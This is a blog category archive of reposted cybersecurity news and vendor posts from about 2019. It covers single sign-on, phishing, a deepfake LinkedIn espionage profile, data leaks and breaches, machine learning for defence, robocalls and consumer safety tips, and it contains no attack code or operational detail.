Category Archives: Cybersecurity

SSO- How It Improves Cybersecurity and User Experience

The launch of the Single Signing Project (SSO) in an organization is often associated with user dissatisfaction with current IT systems and the need to remember several user IDs and passwords to access daily applications.

In the absence of an application that is designed to store credentials and passwords and automatically enter them for users, many users tend to ignore security policies. They choose weak passwords (multiple characters, simple, predictable), or share with their trusted colleagues outside the office.

A good SSO serves all needs: users benefit from simple and fast authentication of all authorized applications and can implement a comprehensive security policy that covers all IT systems. SSO strengthens authentication and allows tracking of all controlled applications. In addition, CFOs can significantly reduce the cost of managing and updating user passwords.

How to start a session (SSO) increases the security of the computer

SSO is becoming the best practice in IT security. It reduces the cognitive burden of IT admins and allow them to concentrate on IT management, and improve operational workflows. As a part of cybersecurity strategies – SSO is a strategic investment in the IT security of organizations, and the reason why is as follows:

SSO increases security by replacing conventional passwords

Passwords are the main cause of most computer security breaches because they can be lost, shared, stolen, or easily forgotten. When a user password is filtered, the boundary of the entire company can be fully opened. Companies can effectively block their human perimeter and dispose of most of their employee keys with SSO solutions. By changing passwords with safer, faster, and stronger user authentication methods, such as quick badge support, SSO can significantly improve corporate cyber security efforts by eliminating many of the weaknesses of old passwords.

SSO improves safety by reducing cognitive stress

Passwords require that users continue to share their attention between their computer systems and their daily activities. By forcing users to perform multiple tasks by writing long alphanumeric strings in the dialog box, passwords increase employee cognitive load. This cognitive tension forces professionals to improvise unsecured password solutions to reduce their frustration. Such solutions include writing passwords on papers, using general credentials, or sharing accounts. Although this type of solution is easier to use and does not frustrate users, it is a nightmare for IT security. Single-entry system (SSO) and the elimination of cognitive stress, allow users to quickly and easily access their sessions without having to write long and complicated passwords multiple times.

SSO increases security by reducing hacking

No matter how clever a user is, they can easily be manipulated to reveal their passwords to hackers through clever hacking tactics. The techniques of phishing, are so sophisticated that even the most experienced users can succumb to them. Users, tired of changing passwords, retrieving them and often entering complex passwords, are naturally immune to password requirements. If a hacker offers a fake dialog box, a fake password reset email, at least one user falls into the trap of hackers. By replacing manual passwords with a secure and centralized single sign-on system, users are automatically protected from the most sophisticated password-poaching method.

SSO improves security by freeing IT resources

An SSO solution is exponentially easier to manage than a password-heavy IT system. In the absence of user passwords, which are frequently changed, lost, or forgotten, IT departments are no longer bogged down with mundane password reset calls and related maintenance requests. With SSO, IT departments can refocus their time and energy on more strategic security initiatives while their SSO solution centralizes password resets and handles all the necessary reporting and auditing features.

An effective SSO solution improves an organization’s security efforts by eradicating the security problems: the password. By replacing passwords, SSO reduces users’ loads, improves workflows, protects organizations from security breaches, and frees IT resources to work on more strategic security projects. For each of these reasons, implementing an SSO solution is a sound cybersecurity decision for businesses.

 

The post SSO- How It Improves Cybersecurity and User Experience appeared first on .

Why phishing education has never been more critical to your business

Our cyber defenses are becoming stronger and stronger every year. Even the smallest companies can now deploy advanced anti-malware and intrusion detections tools that were, until recently, only within the reach of larger enterprises. Today, sandboxed behavior detection and machine-learning/artificial intelligence powered security services make it easy for organizations of any size to crack down on even the most sophisticated malware. Users are still the weakest link But as our network perimeter and endpoint security … More

The post Why phishing education has never been more critical to your business appeared first on Help Net Security.

Deepfake LinkedIn Profile Shows Espionage Threat

A deepfake account with possible connections to foreign espionage activity has been identified on LinkedIn.

“Katie Jones” purported to be a senior researcher for the Center for Strategic and International Studies (CSIS). Her well-connected profile on the professional social media site seemed legitimate, with connections that included a deputy assistant secretary of state and economist Paul Winfree, currently being considered for a seat on the Federal Reserve.

An investigation conducted by the Associated Press found that Jones doesn’t exist, and that her profile photo–depicting an attractive woman in her 30s–was a deepfake created using generative adversarial networks, or GANs, AI-driven software that can produce believable images of fictitious people.

“For a while now people have been worrying about the threat of ‘deepfakes’, AI-generated personas that are indistinguishable, or almost indistinguishable, from real live humans,” tweeted AP reporter Raphael Satter, who first reported on the story.

“I conducted about 40 interviews, speaking to all but a dozen of Katie’s connections. Overwhelmingly, her connections told me they accepted whoever asked to their network,” Satter wrote in another tweet.

LinkedIn has been called a “spy’s playground” in reference to the site’s functionality, which makes rote the acceptance of connections from strangers with the suggestion that doing do might benefit their own careers. The German spy agency Bundesamt für Verfassungsschutz (BfV) warned of the potential danger of the platform and how “[i]nformation about habits, hobbies and even political interests can be generated with only a few clicks.”

“Instead of dispatching spies to some parking garage in the U.S to recruit a target, it’s more efficient to sit behind a computer in Shanghai and send out friend requests to 30,000 targets,” said William Evanina, director of the U.S. National Counterintelligence and Security Center.

Digital imaging experts warn LinkedIn users to look for telltale signs of GAN-generated profiles, such as those in the below photo. Several more examples can be found on the website thispersondoesnotexist.com, which randomly generates GAN photos.

AP Deepfake photo
Source: AP Photo

Read the original AP report here.

The post Deepfake LinkedIn Profile Shows Espionage Threat appeared first on Adam Levin.

What does runtime container security really mean?

End-to-end protection for containers in production is required to avoid the steep operational and reputational costs of data breaches. As news of container attacks and fresh vulnerabilities continues to prove, short cuts (or incomplete security strategies) aren’t going to work. Runtime container security means vetting all activities within the container application environment, from analysis of container and host activity to monitoring the protocols and payloads of network connections. Containers running in production environments actively fulfill … More

The post What does runtime container security really mean? appeared first on Help Net Security.

Human error still the cause of many data breaches

With the incidence of reported data breaches on the rise, more than half of all C-suite executives (C-Suites) (53%) and nearly three in 10 Small Business Owners (SBOs) (28%) who suffered a breach reveal that human error or accidental loss by an external vendor/source was the cause of the data breach, according to a Shred-it survey conducted by Ipsos. When assessing additional causes of data breaches, the report found that nearly half of all C-Suites … More

The post Human error still the cause of many data breaches appeared first on Help Net Security.

Security Affairs newsletter Round 218 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

newsletter Digging The Deep Web

Once again thank you!

Critical RCE affects older Diebold Nixdorf ATMs
Facebook is going to stop Huawei pre-installing apps on mobile devices
Millions of Exim mail servers vulnerable to cyber attacks
CIA sextortion campaign, analysis of a well-organized scam
CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system
Microsoft warns of spam campaign exploiting CVE-2017-11882 flaw
Retro video game website Emuparadise suffered a data breach
Shanghai Jiao Tong University data leak – 8.4TB in email metadata exposed
Spain extradites 94 Taiwanese to China phone and online fraud charges
Adobe Patch Tuesday updates fix code execution issues in Campaign, ColdFusion, and Flash
Customs and Border Protection (CBP) confirms hack of a subcontractor
CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign
How Ursnif Evolves to Keep Threatening Italy
MuddyWater APT group updated its multi-stage PowerShell backdoor Powerstats
Vulnerability in WordPress Live Chat Plugin allows to steal and hijack sessions
FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor
Google expert disclosed details of an unpatched flaw in SymCrypt library
Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws
Radiohead releases a trove of stolen music in response to the hack
RAMBleed, a new Side-Channel Attack that allows stealing sensitive data
Flaw in Evernote Web Clipper for Chrome extension allows stealing data
Massive DDos attack hit Telegram, company says most of junk traffic is from China
Ransomware paralyzed production for at least a week at ASCO factories
WAGO Industrial Switches affected by multiple flaws
Dissecting NanoCore Crimeware Attack Chain
French authorities released the PyLocky decryptor for versions 1 and 2
Millions of Exim mail servers are currently under attack
Mozilla addressed flaws in Thunderbird that allow code execution
Yubico is replacing for free YubiKey FIPS devices due to security weakness
Xenotime threat actor now is targeting Electric Utilities in US and APAC

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 218 – News of the week appeared first on Security Affairs.

Organizations are advancing their efforts, investing in OT cybersecurity programs

ICS cybersecurity threats remain high and present evolving challenges, a new SANS report reveals. However, since the last SANS OT/ICS report released in 2017, a growing majority of organizations have significantly matured their security postures over the last two years and are adopting strategies that address OT/IT convergence. “The findings in this latest SANS report make it clear that 2019 is the year for ICS cybersecurity,” said Nozomi Networks CEO Edgard Capdevielle. “We see the … More

The post Organizations are advancing their efforts, investing in OT cybersecurity programs appeared first on Help Net Security.

The gaming community is a rising target for credential stuffing attacks

Hackers have targeted the gaming industry by carrying out 12 billion credential stuffing attacks against gaming websites within the 17-month period analyzed in the report (November 2017 – March 2019) by Akamai. 55 billion credential stuffing attacks This puts the gaming community among the fastest rising targets for credential stuffing attacks and one of the most lucrative targets for criminals looking to make a quick profit. During the same time period, Akamai saw a total … More

The post The gaming community is a rising target for credential stuffing attacks appeared first on Help Net Security.

GDPR implementation lessons can help with CCPA compliance

The ever increasing number of data breaches has made consumers more aware of how their data is being used and has emphasized the importance of keeping personal data private, says Sovan Bin, CEO and founder of cloud data management firm Odaseva. “In terms of the general public, the California Consumer Privacy Act (CCPA) is a wake-up call for consumers to know and understand their data privacy rights. They should feel free to exercise these rights … More

The post GDPR implementation lessons can help with CCPA compliance appeared first on Help Net Security.

CISO do’s and don’ts for board reporting

Security is no longer just a job for IT – it impacts all areas of a business, from brand perception to the bottom line. As a result, CISOs are increasingly being asked to deliver cybersecurity reports to their boards, including information on global trends, security performance, security strategy, and security spend. In an ideal world, this increase in board visibility would foster a new collaborative relationship between security leaders and their executive stakeholders; one that … More

The post CISO do’s and don’ts for board reporting appeared first on Help Net Security.

Healthcare executives need to make cybersecurity a business priority

Risks associated with Internet of Things, medical devices, third-party vendors, and program management are top of mind for healthcare executives, according to a CynergisTek’s survey. The survey of approximately 60 C-level healthcare executives revealed the greatest perceived threats and current challenges these organizations are facing in cybersecurity and privacy. The data also pinpointed some of the barriers or disconnects within the organization to solve these issues, like executive leadership buy-in. Most notably: 40% responded that … More

The post Healthcare executives need to make cybersecurity a business priority appeared first on Help Net Security.

Code signing keys and certificates are crucial security assets, are you protecting them?

Only 28 percent of organizations consistently enforce a defined security process for code signing certificates, a Venafi study of over 320 security professionals in the U.S., Canada and Europe reveals. “When the code signing keys and certificates that serve as machine identities fall into the hands of attackers, they can inflict enormous damage,” said Kevin Bocek, vice president of security strategy and threat intelligence at Venafi. “Secure code signing processes enable apps, updates, and open … More

The post Code signing keys and certificates are crucial security assets, are you protecting them? appeared first on Help Net Security.

Personal security and national security concerns are back on the rise

More than one in five (22%) Americans say they have cancelled plans or considered cancelling plans to attend large-scale public events due to concerns about physical attacks and the safety of their data, according to the new 2019 Unisys Security Index. Safety at events The survey also found that a high majority (83%) of Americans are concerned about a criminal attack causing physical harm at large-scale events such as sporting events or concert festivals – … More

The post Personal security and national security concerns are back on the rise appeared first on Help Net Security.

The Tax Paying Hacker: A Modern Phenomenon

In a dark room lit only by the light from four computer monitors sits a hacker named Hector (not his real name). You can hear the faint pulse of an EDM track coming from his headphones as Hector taps away on his computer’s keyboard. The above description could serve as the setting for a hacker […]… Read More

The post The Tax Paying Hacker: A Modern Phenomenon appeared first on The State of Security.

You’re Probably Worse Than You Think at Cybersecurity. You’re Not Alone.

If you’re like most people, you feel confident and well-informed about online security, and if you’re like most people you have absolutely no reason to feel that way.

That was the conclusion of a new survey from Harris Poll and Google, which found that 55% of Americans above the age of 16 graded themselves as an A or B when it comes to online safety, but only 23% could identify a link with “https” as being more secure than “http,” 70% misidentified a secure URL, and a whopping 97% got at least one answer wrong on a basic six-question security test.

But don’t let it get you down–many major companies aren’t very good at online security, either.

First American Financial and Google’s Years-Long Blunder

Take, for example, First American Financial Corp. The company stored customer documents and records pertaining to mortgage deals going back 16 years in a way that was openly accessible to anyone with a web browser: zero authentication or encryption required. All one needed was a guessable URL to view documents related to mortgage deals including bank account numbers, tax records, Social Security numbers, and scans of drivers licenses. There were scads of records involved, like almost 900 million of them.

As Brian Krebs noted, the number of people with access “would potentially include anyone who’s ever been sent a document link via email by First American.”  By extension, it would also include anyone with access to an email fitting that description.

While First American is a Fortune 500 company, it has never demonstrated any interest in being a cybersecurity-forward company. That said, even companies that take cyber security seriously often get it wrong.

Take Google, for instance. The search giant came clean about a similar gaffe earlier this month, revealing that passwords associated with the accounts of an unspecified number of G Suite users had been stored in an unencrypted format on their servers for 14 years.

“To be clear, these passwords remained in our secure encrypted infrastructure,” the company announced in a blog. Considering that the passwords were supposed to be stored in an encrypted format, reassurances about infrastructure seem a bit hollow.

And Many, Many Others

Google and First American are hardly alone. Facebook’s seemingly unending parade of major privacy accidentsmistakes, and gaffes are mind-boggling and too many to list here.

This month alone 49 million Instagram users learned their personal information had been leaked, and 5 million customers of Canada’s fourth largest cellular provider also were potentially exposed. The FEMA leak of 2.3 million disaster victims as well as Meditlab’s accidental exposure of six million medical records in the form of digitized faxes are two other recent indications from news feeds that we are all living in a state of cyber insecurity.

These news items are noteworthy not only because of the danger they pose to the people whose personal information is now almost certainly in the wrong hands. What matters here is that none of them are data breaches. They are all data leaks.

It’s easy to confuse the two, but while a data breach is a failure to keep a hacker or cyber-attacker out of your data, a data leak is a failure to protect it in the first place. It’s the difference between someone breaking into a bank vault and having an employee not bothering to shut and bolt the vault door. And much like data breaches, leaks only seem to be getting more common.

This is where corporate culture comes into play.

If a majority of people have an unrealistically high opinion of their own security savviness, companies need to take that into account. Lax attitudes and faulty assumptions are rife in the workplace. That Google traversed 14 years as a going concern without checking a basic security feature in one of its flagship services is resounding proof of this troubling fact.

What can companies do?

As the old Peter Drucker saying goes, “Culture eats strategy for breakfast.” While it’s extremely difficult, especially for cybersecurity teams, to change pervasive attitudes in a company, that’s the job at hand.

A few basic practices can help get companies headed in the right direction, and cut down on some of the more easily preventable data leaks:

  • Ask simple questions and encourage others to do the same: Reliance on sophisticated tools for determining cyber risk is an easy (and bad) habit to fall into. Tools should never trump basic questions like, “Is that data encrypted?”
  • Map and inventory your data: Data is an important commodity to businesses and hackers alike. Losing track of customer data or information only opens the door for it to be left accidentally unprotected on a server or a network drive. Any time data is collected, have a policy for documenting where it is, how it’s stored, and who has access to it.
  • Review your practices: Most IT departments are overworked and spread thin. Running from one crisis to the next means less time to check and double-check for any security holes or basic errors in how security is handled.

A sloppy attitude toward data security is ultimately a safety issue. While people affected by a data leak may not be in immediate physical danger, there is potential for lasting harm to customers and a company’s reputation. Much like any other workplace safety issue, a set of rigorous safeguards and workplace training are vital to avoid carelessness.

 

The post You’re Probably Worse Than You Think at Cybersecurity. You’re Not Alone. appeared first on Adam Levin.

Harnessing Machine Learning and Automation against Advanced Threats

Estimated reading time: 2 minutes

With the specter of advanced cybersecurity threats always on the horizon, enterprises are seriously considering harnessing the power of machine learning and automation to fight against these threats. For good reason too – a cybersecurity survey suggested that organizations with an extensive use of automation rated themselves as much more likely to prevent, detect, respond and contain a cyber attack.

These concepts are getting increasingly important in today’s changing era of fast-growing cyber threats but what do they mean exactly? Machine learning basically refers to computers learning from data instead of receiving explicit programming. Through such machine learning algorithms, computers are fed huge datasets and parse through them to recognize patterns or co-relations through extended data analysis.

The importance of machine learning

Machine learning is becoming a common feature in more and more industries and cybersecurity has not lagged behind. An ABI Research report estimated that machine learning in cybersecurity will boost big data, intelligence and analytics spending to $96 billion by 2021. It is quite clear why there is such extended growth – machine learning allows business to offer a better response and bolster their own defense when it comes to the big, bad world of cyber threats. Security companies are rejigging the solutions they offer in tune with this trend. They are moving from signature-based systems to layered solutions where machine learning systems interpret data to better detect malware.

Some of these advantages are:

Making Sense of Data – The amount of data that can be collected for cybersecurity is humongous. While the sheer size and amount of data may be too much for humans alone to analyze, this is where machine learning can step in. By analyzing and processing big amount of data, it may be possible to find patterns or categories of certain behavior which can be used to fight advanced cybersecurity threats.

Using Automation for Better Protection – Different threats can have different attack points for an enterprise and even one threat may attack different touchpoints in different ways. This is where automation can do a much more effective job. By understanding the predicted behavior and touchpoints of a potential attack, automation can create better protection measures across touchpoints suited to exactly the type of predicted attack.

Using A Cluster-based approach for better detection – Quick Heal already uses machine learning to solve various cybersecurity problems using a cluster-based approach, illustrated in this whitepaper. Sample are clustered through machine learning with each cluster having samples similar to each other. These generated clusters are huge and processing them happens through machine learning where they are aggregated, analyzed and automated. The data is then labeled and processed to generate models. After scrutiny on numerous factors including time, size, quality, they are qualified for endpoint deployment.

Machine Learning and automation will be great weapons in the fight against advanced cybersecurity threats but it also need to be backed up with a combination of data science and human expertise.

 

The post Harnessing Machine Learning and Automation against Advanced Threats appeared first on Seqrite Blog.

Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel

With summertime just around the corner, families are eagerly looking to book their next getaway. Since vacation is so top-of-mind during the summer months, users are bound to come across websites offering cheap deals on flights, accommodations, and other experiences and activities. With so many websites claiming to offer these “can’t-miss deals,” how do you know who to trust?

It turns out that this is a common concern among folks looking for a little summer getaway. According to our recent survey of 8,000 people across the UK, US, Canada, Australia, France, Germany, Spain, and Singapore, 54% of respondents worry about their identity being stolen while booking and purchasing travel and accommodation online. However, 27% don’t check the authenticity of a website before booking their vacation online. Over half of these respondents say that it doesn’t cross their minds to do so.

These so-called “great deals” can be difficult to pass up. Unfortunately, 30% of respondents have been defrauded thanks to holiday travel deals that were just too good to be true. What’s more, 46.3% of these victims didn’t realize they had been ripped off until they arrived at their holiday rental to find that the booking wasn’t actually valid.

In addition to avoiding bogus bookings, users should also refrain from risky online behavior while enjoying their summer holidays. According to our survey, 44.5% of respondents are putting themselves at risk while traveling by not checking the security of their internet connection or willingly connecting to an unsecured network. 61% also stated that they never use a VPN, while 22% don’t know what a VPN is.

Unfortunately, travel-related attacks aren’t limited to just travelers either; hotels are popular targets for cybercriminals. According to analysis conducted by the McAfee Advanced Threat Research team, the most popular attack vectors are POS malware and account hijacking. Due to these attacks, eager vacationers have had their customer payment, credit card data, and personally identifiable information stolen. In order for users to enjoy a worry-free vacation this summer, it’s important that they are aware of the potential cyberthreats involved when booking their trips online and what they can do to prevent them.

Together with HomeAway, we here at McAfee are working to help inform users of the risks they face when booking through unsecured or unreliable websites as well as when they’re enjoying some summertime R&R. Check out the following tips so you can enjoy your vacation without questioning the status of your cybersecurity:

  • Always connect with caution. If you need to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) to help keep your connection secure.
  • Think before you click. Often times, cybercriminals use phishing emails or fake sites to lure consumers into clicking links for products or services that could lead to malware. If you receive an email asking you to click on a link with a suspicious URL, it’s best to avoid interacting with the message altogether.
  • Browse with security protection. Use a comprehensive security solution, like McAfee Total Protection, which includes McAfee WebAdvisor that can help identify malicious websites.
  • Utilize an identity theft solution. With all this personal data floating around online, it’s important to stay aware of any attempts to steal your identity. Use an identity theft solution, such as McAfee Identity Theft Protection, that can help protect personally identifiable information from identity theft and fraud.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel appeared first on McAfee Blogs.

First framework to score the agility of cyber attackers and defenders

To help train government and industry organizations on how to prevent cyberattacks, as part of a research project for the U.S. Army, scientists at The University of Texas at San Antonio, developed the first framework to score the agility of cyber attackers and defenders. “The DOD and U.S. Army recognize that the cyber domain is as important a battlefront as ground, air and sea,” said Dr. Purush Iyer, division chief, network sciences at Army Research … More

The post First framework to score the agility of cyber attackers and defenders appeared first on Help Net Security.

Why Cybersecurity Recruitment On The Rise?

Cybersecurity is a field in demand. Growing cyber-attacks, the demand for secure and secure data, and other concerns mean that businesses need professionals to protect their information.

If you’re considering a career change in 2019, you may want to take a look at the growing cybersecurity market, which is expected to grow in 2019- 2020

This is an area where the good guys, the cybersecurity professionals, are dealing with bad guys, cybercriminals and hackers. Assuming you want to be a good guy, a career can mean a six-figure salary, job security, and upward mobility potential.

A job in the field of cybersecurity is the ideal solution for anyone who wants to work in the field of technology at the moment. Data compiled by the recruitment website shows an increase in demand compared to 2018.

Increasing the popularity of such works should not be a big surprise considering the current climate. The frequency and severity of data breaches are increasing, with attacks directed against well-known companies that regularly post information. And with the implementation of increasingly stringent privacy laws, such as the GDPR, companies have never focused more on protecting their networks and the valuable information that flows through them.

But what do these jobs really mean? Instead of any detail on the skills currently required, we see only vague and general titles: “Computer Security Specialist, Computer Security Engineer, and Security Consultant”. It would be difficult to be less precise. However, what matters most to the security of an organization is the experience, knowledge, and specialized experience behind those titles. Unfortunately, human resources teams, business leaders, and board members who decide who to hire often do not understand the nuances of what it really means to be at the frontline against cyber threats.

Be Specific

Threat actors will use a variety of techniques to exploit both technological and human vulnerabilities as part of their mission of stealing valuable information, forcing businesses to pay a ransom or cause damage.

In 2018, nearly two-thirds of businesses were victims of a zero-day attack, while the number of phishing attacks increased by nearly 300%. DNS is still a target because attackers exploit this amazingly unprotected protocol to filter out confidential information with DDoS attacks. Web applications are vulnerable to SQL injection and database attacks. And the users themselves are considered the weakest point of any computer network, sometimes deliberately, but usually by accident.

The problem is that since there is not a single security expert, as there is no single attack vector. A business needs to know the nuances in order to effectively protect its attack surface. It is important, to understand that an expert in application security may have a less well knowledge of digital forensics and reverse engineering has a general security stance.

Related Resources:

Top 3 Cybersecurity Measures: Skepticism, Awareness and Training

Cybersecurity Prediction for 2019

The post Why Cybersecurity Recruitment On The Rise? appeared first on .

3.4 billion fake emails are sent around the world every day

At least 3.4 billion fake emails are sent around the world every day — with most industries remaining vulnerable to spear-phishing and “spoofing” cyberattacks simply because they’re not implementing industry-standard authentication protocols, according to a Valimail report. The research report also found that the vast majority of suspicious emails emanate from U.S.-based sources. It’s not all bad news, however. Ongoing research also indicates that many industries are making progress in the fight against impersonation, some … More

The post 3.4 billion fake emails are sent around the world every day appeared first on Help Net Security.

1.1M Emuparadise Accounts Exposed in Data Breach

If you’re an avid gamer or know someone who is, you might be familiar with the retro gaming site Emuparadise. This website boasts a large community, a vast collection of gaming music, game-related videos, game guides, magazines, comics, video game translations, and more. Unfortunately, news just broke that Emuparadise recently suffered a data breach in April 2018, exposing the data of about 1.1 million of their forum members.

The operators of the hacked-database search engine, DeHashed, shared this compromised data with the data breach reference site Have I Been Pwned. According to the site’s owner Troy Hunt, the breach impacted 1,131,229 accounts and involved stolen email addresses, IP addresses, usernames, and passwords stored as salted MD5 hashes. Password salting is a process of securing passwords by inputting unique, random data to users’ passwords. However, the MD5 algorithm is no longer considered sufficient for protecting passwords, creating cause for cybersecurity concern.

Emuparadise forced a credential reset after the breach occurred in April 2018. It’s important that users of Emuparadise games take steps to help protect their private information. If you know someone who’s an avid gamer, pass along the following tips to help safeguard their security:

  • Change up your password. If you have an Emuparadise account, you should change up your account password and email password immediately. Make sure the next one you create is strong and unique so it’s more difficult for cybercriminals to crack. Include numbers, lowercase and uppercase letters, and symbols. The more complex your password is, the better!
  • Keep an eye out for sketchy emails and messages. Cybercriminals can leverage stolen information for phishing emails and social engineering scams. If you see something sketchy or from an unknown source in your email inbox, be sure to avoid clicking on any links provided.
  • Check to see if you’ve been affected. If you or someone you know has made an Emuparadise account, use this tool to check if you could have been potentially affected.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 1.1M Emuparadise Accounts Exposed in Data Breach appeared first on McAfee Blogs.

YouTube Attacks to Watch Out For in 2019

YouTube, the world’s top provider of streaming multimedia content, keeps reaching new heights in terms of its popularity. Nearly two billion monthly users and five billion videos watched every single day – these impressive statistics speak for themselves, and the numbers are steadily growing year over year. Everybody loves YouTube and so do cybercriminals, only […]… Read More

The post YouTube Attacks to Watch Out For in 2019 appeared first on The State of Security.

How Machine Learning Helps Improve Cybersecurity

Cyberattacks have increased on an unprecedented scale. Reasons are many. The main reason obviously is our increasing dependence on computing devices (computers, smartphones etc) and the internet for our day-to-day needs. It’s today a world of quickly evolving technologies. The technology that we depend on today has interconnectedness as one of its salient features. This, plus our habit of using unsecured networks and devices (like, for example, public Wi-Fi) for convenience’s sake, too has proven to be the cause for an unprecedented increase in cyberattacks.

Of the various technologies that we use today to prevent cyberattacks and to ensure cybersecurity, machine learning deserves special mention. Machine learning definitely is a great technology that offers some highly efficient security solutions and thus helps prevent cybercrime.

Today, we discuss how machine learning helps improve and ensure cybersecurity in today’s world…

Today, we have many machine learning apps that are used for enhancing cybersecurity. There are many such apps that help monitor networks for cybersecurity issues and to detect vulnerabilities or breaches. Such apps also help enterprises generate automated responses whenever there are cyberattacks. Let’s take a look at how these apps work and how they can be used for security purposes like spam detection, risk detection, detection of phishing attacks and malware detection.

Machine learning apps and spam detection

Machine learning apps play a very important role when it comes to performing spam detection. Different reports suggest that more than half of all email today is spam, and hence there’s an increasing need for spam filters which could effectively block such spam from reaching inboxes and causing trouble. It’s among such spam that malware-laden phishing emails too feature. Today we have robust machine learning-powered spam filters, which work based on different sets of rules to identify and filter spam and which are also cost-effective. That these machine learning-powered spam filters are highly flexible and efficient compared to other knowledge-based methods makes them more suited for combating cybercrime in today’s context. Such machine-learning spam filtering tools work based on entirely dynamic kinds of algorithms, which are based on pre-classified datasets that classify emails as spam or not spam based on many features, including the hyperlinks, the attachments, the word frequency count, the HTML tags, the length of the email, the IP address etc.

Machine learning apps and risk detection

Risk detection and responding to potential risks on a timely basis are all part of the very foundations of cybersecurity. Machine learning apps that are used for cybersecurity help monitor, analyze and respond to all kinds of threats and attacks that happen on the networks, the software and the applications, plus the hardware as well. It has to be remembered that infiltration or infection of a network happens much before detection; attackers could infiltrate systems or networks and remain there without doing anything for many months before launching an attack. It’s here that machine learning comes in handy. Machine learning plays a key role in identifying and detecting cybercrime, in protecting networks and their components from all kinds of risk, and in response and recovery as well.

Detection of phishing attacks using machine learning

Most research data show that cybercriminals are increasingly using phishing techniques to launch cyberattacks. In fact, phishing techniques are the most popular among all techniques used to launch attacks. All internet users get phishing emails delivered to their inboxes on a regular basis and hence detection of phishing attacks is important as regards preventing cybercrime. Phishing attacks could lead to the breach of sensitive personal data including credit card data, banking data, login credentials, intellectual property etc. Phishing attacks are widely used for launching ransomware strikes as well. There are different kinds of phishing attacks and hence anti-phishing methods basically fall under three main groups, namely detective methods, preventive methods and corrective methods. Machine learning algorithms are widely used to help detect phishing emails or websites. This is done by monitoring and analyzing data and related features like the number of links, IP addresses, IP-based URLs, JavaScript presence etc.

Machine learning and malware detection

For long we have had traditional malware detection methods which focused on identifying features like hashes, file properties, code fragments etc. But with the introduction of server-side polymorphism, such detection methods have become irrelevant and obsolete. Today, we have worked out a big shift from the former rule-based malware-detection methods and focus more on detecting malware by analyzing files during the pre-execution phase itself using machine learning. Detecting advanced malware attacks, including ransomware attacks, have thus become easier and more effective, thanks to machine learning. We also use deep learning algorithms to detect rare, high-profile targeted attacks. Thus, machine learning is helping us detect all kinds of malware including trojans, ransomware, adware, spyware etc.

Machine learning has its own limitations as well!

Machine learning, which has immense possibilities when it comes to preventing cybercrime, has its limitations as well. For example, there are ambiguities relating to the definitions of activities as ‘normal’ or ‘anomalous’. There are also issues pertaining to adaptability to new patterns and drastically changing methods of cyberattacks. Fake positives also pose a headache to machine learning methods.

Well, despite these limitations, it’s to be mentioned that machine learning is definitely helping us in ensuring improved cybersecurity. The limitations would in due course be overcome, and machine learning would definitely offer us more possibilities as regards cybercrime detection and prevention.

Related Blogs:

Man Vs. Machines: Employing Artificial Intelligence in Cybersecurity

Cyber security and strategy

Average Cost of Cyberattack Exceeds $1 Million

The post How Machine Learning Helps Improve Cybersecurity appeared first on .

Say So Long to Robocalls

For as long as you’ve had a phone, you’ve probably experienced in one form or another a robocall. These days it seems like they are only becoming more prevalent too. In fact, it was recently reported that robocall scams surged to 85 million globally, up 325% from 2017. While these scams vary by country, the most common type features the impersonation of legitimate organizations — like global tech companies, big banks, or the IRS — with the goal of acquiring user data and money. When a robocall hits, users need to be careful to ensure their personal information is protected.

It’s almost impossible not to feel anxious when receiving a robocall. Whether the calls are just annoying, or a cybercriminal uses the call to scam consumers out of cash or information, this scheme is a big headache for all. To combat robocalls, there has been an uptick in apps and government intervention dedicated to fighting this ever-present annoyance. Unfortunately, things don’t seem to be getting better — while some savvy users are successful at avoiding these schemes, there are still plenty of other vulnerable targets.

Falling into a cybercriminal’s robocall trap can happen for a few reasons. First off, many users don’t know that if they answer a robocall, they may trigger more as a result. That’s because, once a user answers, hackers know there is someone on the other end of the phone line and they have an incentive to keep calling. Cybercriminals also have the ability to spoof numbers, mimic voices, and provide “concrete” background information that makes them sound legitimate. Lastly, it might surprise you to learn that robocalls are actually perfectly legal. It starts to become a grey area, however, when calls come through from predatory callers who are operating on a not-so-legal basis.

While government agencies, like the Federal Communications Commission and Federal Trade Commission, do their part to curb robocalls, the fight to stop robocalls is far from over, and more can always be done. Here are some proactive ways you can say so long to pesky scammers calling your phone.

  1. There’s an app for that. Consider downloading the app Robokiller that will stop robocalls before you even pick up. The app’s block list is constantly updating, so you’re protected.
  2. Let unknown calls go to voicemail. Unless you recognize the number, don’t answer your phone.
  3. Never share personal details over the phone. Unfortunately, there’s a chance that cybercriminals may have previously obtained some of your personal information from other sources to bolster their scheme. However, do not provide any further personal or financial information over the phone, like SSNs or credit card information.
  4. Register for the FCC’s “Do Not Call” list. This can help keep you protected from cybercriminals and telemarketers alike by keeping your number off of their lists.
  5. Consider a comprehensive mobile security platform. Utilize the call blocker capability feature from McAfee Mobile Security. This tool can help reduce the number of calls that come through.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Say So Long to Robocalls appeared first on McAfee Blogs.

Hackproofing smart meters and boosting smart grid security

Smart electricity meters are useful because they allow energy utilities to efficiently track energy use and allocate energy production. But because they’re connected to a grid, they can also serve as back doors for malicious hackers. Cybersecurity researcher Karthik Pattabiraman, an associate professor of electrical and computer engineering at UBC, recently developed an automated program aimed at improving the security of these devices and boosting security in the smart grid. “Our program uses two detection … More

The post Hackproofing smart meters and boosting smart grid security appeared first on Help Net Security.

Podcast Two Year Anniversary – The Top 10 Episodes

Two years ago on June 9th, 2017 I released the first episode of Security In Five. Here we are two years later, 500+ episodes recorded and no signs of slowing down. The podcast’s longevity and the energy to keep up the dail episode schedule is all because of the listeners and feedback I have received. […]

The post Podcast Two Year Anniversary – The Top 10 Episodes appeared first on Security In Five.

